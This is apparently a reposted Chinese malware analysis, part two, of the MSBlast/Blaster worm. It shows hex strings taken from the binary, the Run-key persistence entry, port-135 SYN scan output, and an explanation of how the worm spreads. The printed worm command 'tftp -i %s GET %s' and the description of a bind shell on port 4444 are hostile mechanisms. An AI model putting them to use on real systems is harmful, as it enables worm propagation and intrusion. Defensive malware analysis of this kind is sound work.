鲜为人知的冲击波(MSBlast)病毒详细代码分析报告(二)(转)
(接上贴)
以上的分析为反汇编分析,而以下部分是利用Winhex查看病毒十六进制。
********************************************************************************************
49 20 6A 75 73 74 20 77 61 6E 74 20 74 6F 20 73 61 79 20 4C 4F 56 45 20 59 4F 55 20 53 41 4E 21 21 00 62 69 6C 6C 79 20 67 61 74 65 73 20 77 68 79 20 64 6F 20 79 6F 75 20 6D 61 6B 65 20 74 68 69 73 20 70 6F 73 73 69 62 6C 65 20 3F 20 53 74 6F 70 20 6D 61 6B 69 6E 67 20 6D 6F 6E 65 79 20 61 6E 64 20 66 69 78 20 79 6F 75 72 20 73 6F 66 74 77 61 72 65 21 21 00
*利用Winhex查看十六进制,发现偏移为00001A40的十六进制的ASCII转换为明文为:
I just want to say LOVE YOU SAN!! billy gates why do you make this possible ? Stop making money and fix your software!!
********************************************************************************************
********************************************************************************************
77 69 6E 64 6F 77 73 75 70 64 61 74 65 2E 63 6F 6D
*利用Winhex查看十六进制,发现偏移为000021E0的十六进制的ASCII转换为明文为:
windowsupdate.com
********************************************************************************************
********************************************************************************************
73 74 61 72 74 20 25 73 0A 00 74 66 74 70 20 2D 69 20 25 73 20 47 45 54 20 25 73
*利用Winhex查看十六进制。发现偏移为00002200的十六进制,其中%s为变量。ASCII转换为明文为:
start %s tftp -i %s GET %s
********************************************************************************************
********************************************************************************************
77 69 6E 64 6F 77 73 20 61 75 74 6F 20 75 70 64 61 74 65 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E
*利用Winhex查看十六进制。发现偏移为00002250的十六进制的ASCII转换为明文为:
windows auto update SOFTWARE\Microsoft\Windows\CurrentVersion\Run
********************************************************************************************
开始跟踪
开始运行病毒之前要准备好监视工具,看病毒会修改注册表、新增文件、开启端口等。
运行MSBlast.exe病毒之后,利用Regshot监视注册表发现新增1处键值,键值为msblast.exe。我在运行的时候将MSBlast.exe放在C盘目录下,然写键值仍为msblast.exe,下次开机MSBlast.exe则不会自动运行。说明作者编写病毒时候键值并不是写入exe当前文件路径,而是指向system32目录下。我在测试过程中是这样的情况。而被感染病毒之后,MSBlast.exe文件都复制到对方的system32目录下,每次开机都会运行。
********************************************************************************************
增加值:1
----------------------------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update: 6D 73 62 6C 61 73 74 2E 65 78 65 00 49 20 6A 75 73 74 20 77 61 6E 74 20 74 6F 20 73 61 79 20 4C 4F 56 45 20 59 4F 55 20 53 41 4E 21 21 00 62 69 6C 6C
********************************************************************************************
运行病毒之后创建mutex内核对象,病毒软件随机打开本地端口开始向外部IP发出20个syn扫描连接, 目标主机IP地址由病毒程式随机产生。
********************************************************************************************
TCP 192.168.0.23:4608 27.185.154.157:135 SYN_SENT
TCP 192.168.0.23:4609 27.185.154.158:135 SYN_SENT
TCP 192.168.0.23:4610 27.185.154.159:135 SYN_SENT
TCP 192.168.0.23:4611 27.185.154.160:135 SYN_SENT
TCP 192.168.0.23:4612 27.185.154.161:135 SYN_SENT
TCP 192.168.0.23:4613 27.185.154.162:135 SYN_SENT
TCP 192.168.0.23:4614 27.185.154.163:135 SYN_SENT
TCP 192.168.0.23:4615 27.185.154.164:135 SYN_SENT
TCP 192.168.0.23:4616 27.185.154.165:135 SYN_SENT
TCP 192.168.0.23:4617 27.185.154.166:135 SYN_SENT
TCP 192.168.0.23:4618 27.185.154.167:135 SYN_SENT
TCP 192.168.0.23:4619 27.185.154.168:135 SYN_SENT
TCP 192.168.0.23:4620 27.185.154.169:135 SYN_SENT
TCP 192.168.0.23:4621 27.185.154.170:135 SYN_SENT
TCP 192.168.0.23:4622 27.185.154.171:135 SYN_SENT
TCP 192.168.0.23:4623 27.185.154.172:135 SYN_SENT
TCP 192.168.0.23:4624 27.185.154.173:135 SYN_SENT
TCP 192.168.0.23:4625 27.185.154.174:135 SYN_SENT
TCP 192.168.0.23:4626 27.185.154.175:135 SYN_SENT
TCP 192.168.0.23:4627 27.185.154.176:135 SYN_SENT
********************************************************************************************
病毒反汇编代码中有一段代码是: tftp -i %s GET %s,此段代码用来下载病毒。默认情况下tftp的服务器开启的端口为UDP/69,如果病毒程序溢出目标主机成功之后会绑定目标主机一个4444的端口,然后发送下载消息,目标主机通过tftp下载病毒再运行病毒。反复循环导致更多的计算机受到感染。
攻击失败之后PRC服务会停止,文件复制贴粘功能失效,com+属性页无法显示。也有可能会造成svchost.exe进程被关闭,导致计算机重新启动。